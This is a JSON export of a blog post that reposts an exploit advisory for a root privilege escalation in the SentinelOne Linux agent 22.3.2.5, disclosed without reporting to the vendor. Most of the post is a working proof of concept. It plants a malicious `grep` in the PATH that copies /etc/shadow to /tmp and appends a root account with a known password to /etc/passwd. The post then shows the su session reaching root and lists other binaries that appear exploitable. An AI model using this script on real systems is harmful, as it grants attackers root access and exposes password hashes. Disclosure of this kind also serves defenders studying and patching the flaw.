{"id":34506,"date":"2022-12-07T18:08:24","date_gmt":"2022-12-07T15:08:24","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/170128\/sentinelone-escalate.txt"},"modified":"2022-12-11T10:17:51","modified_gmt":"2022-12-11T06:47:51","slug":"sentinelone-sentinelagent-22-3-2-5-privilege-escalation","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/sentinelone-sentinelagent-22-3-2-5-privilege-escalation\/","title":{"rendered":"SentinelOne sentinelagent 22.3.2.5 Privilege Escalation"},"content":{"rendered":"<p dir=\"ltr\">Exploit Title: SentinelOne sentinelagent (linux) root Privilege Escalation zero day vulnerability<br \/>\nDate: 12\/06\/2022<br \/>\nExploit Author: ouch_this_hurts<br \/>\nVendor Homepage: https:\/\/www.sentinelone.com\/<br \/>\nSoftware Link: https:\/\/assets.sentinelone.com\/prod\/s1-linux-agent-datas<br \/>\nVersion: 22.3.2.5<br \/>\nTested on: Ubuntu 22.04.x<br \/>\nCVE: NA<\/p>\n<p dir=\"ltr\">Not enough AI in the world can help you write secure software it seems? The vendor doesn&#8217;t make reporting vulnerabilities easy, so to exploit-db it goes :)<\/p>\n<p dir=\"ltr\">Protips:<br \/>\n&#8211; If I Google you, and I cannot find an easy way to report the vulnerability, I&#8217;m not going to bother.<br \/>\n&#8211; If you require me to use HackerOne, I&#8217;m not going to bother.<br \/>\n&#8211; If you don&#8217;t have a security.txt, how do you expect me to contact you?<\/p>\n<p dir=\"ltr\">Get `root` on a system with `sentinelagent&lt;=22.3.2.5` with one simple trick:<\/p>\n<p dir=\"ltr\">Override `grep` in the `PATH` with your malicious code. Reboot. pwnd. Nice!<\/p>\n<p dir=\"ltr\">PoC below:<br \/>\n1. Find the system&#8217;s &#8220;earliest&#8221; `PATH`, or just override it to whatever you want in `\/etc\/environment` with some other staged exploit.<br \/>\n2. 
Create the following `grep` file in that directory and make sure it&#8217;s executable:<\/p>\n<p dir=\"ltr\">```shell<br \/>\ncat &lt;&lt; SENTINELOOPS &gt; \/usr\/local\/bin\/grep<br \/>\n#!\/bin\/bash<br \/>\n# I think I'll have the passwds pl0x<br \/>\ncat \/etc\/shadow &gt; \/tmp\/etc_shadow<\/p>\n<p dir=\"ltr\"># password is password :)<br \/>\necho 'sentinel_oops:\\$1\\$user1\\$WuzQ29wbcMN09VLW7X0\/q1:0:0::\/root:\/bin\/sh' &gt;&gt; \/etc\/passwd<br \/>\nSENTINELOOPS<\/p>\n<p dir=\"ltr\">chmod +x \/usr\/local\/bin\/grep<br \/>\n```<\/p>\n<p dir=\"ltr\">3. Wait for the machine to reboot, then log in as `sentinel_oops:password` :)<\/p>\n<p dir=\"ltr\">```<br \/>\n$ su sentinel_oops<br \/>\nPassword:<br \/>\n# whoami<br \/>\nroot<br \/>\n```<\/p>\n<p dir=\"ltr\">What actually happened here? On `sentinelagent` start it runs `sh -c &#8220;grep&#8230;.&#8221;`.<\/p>\n<p dir=\"ltr\">So there are potentially other ways of privilege escalation via this &#8220;agent&#8221;?<br \/>\n&#8211; `grep` as demonstrated above<br \/>\n&#8211; `pgrep` examining the binary appears to be vulnerable<br \/>\n&#8211; `xargs` examining the binary appears to be vulnerable<br \/>\n&#8211; `cat` examining the binary appears to be vulnerable<br \/>\n&#8211; `ldd` examining the binary appears to be vulnerable<br \/>\n&#8211; `lsmod` examining the binary appears to be vulnerable<br \/>\n&#8211; `mksh` examining the binary appears to be vulnerable<br \/>\n&#8211; `awk` examining the binary appears to be vulnerable<\/p>\n<p dir=\"ltr\">[CWE-427](https:\/\/cwe.mitre.org\/data\/definitions\/427.html) and [how to write secure software](https:\/\/youtu.be\/RfiQYRn7fBg?t=16)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Title: SentinelOne sentinelagent (linux) root Privilege Escalation zero day vulnerability Date: 12\/06\/2022 Exploit Author: ouch_this_hurts Vendor Homepage: 
https:\/\/www.sentinelone.com\/ Software Link: https:\/\/assets.sentinelone.com\/prod\/s1-linux-agent-datas Version: 22.3.2.5 Tested on: Ubuntu 22.04.x CVE: NA Not enough AI in the world can help you write secure software it seems? The vendor doesn&#8217;t make reporting vulnerabilities easy, so to exploit-db it &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-34506","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34506","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=34506"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34506\/revisions"}],"predecessor-version":[{"id":34702,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34506\/revisions\/34702"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=34506"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=34506"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=34506"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}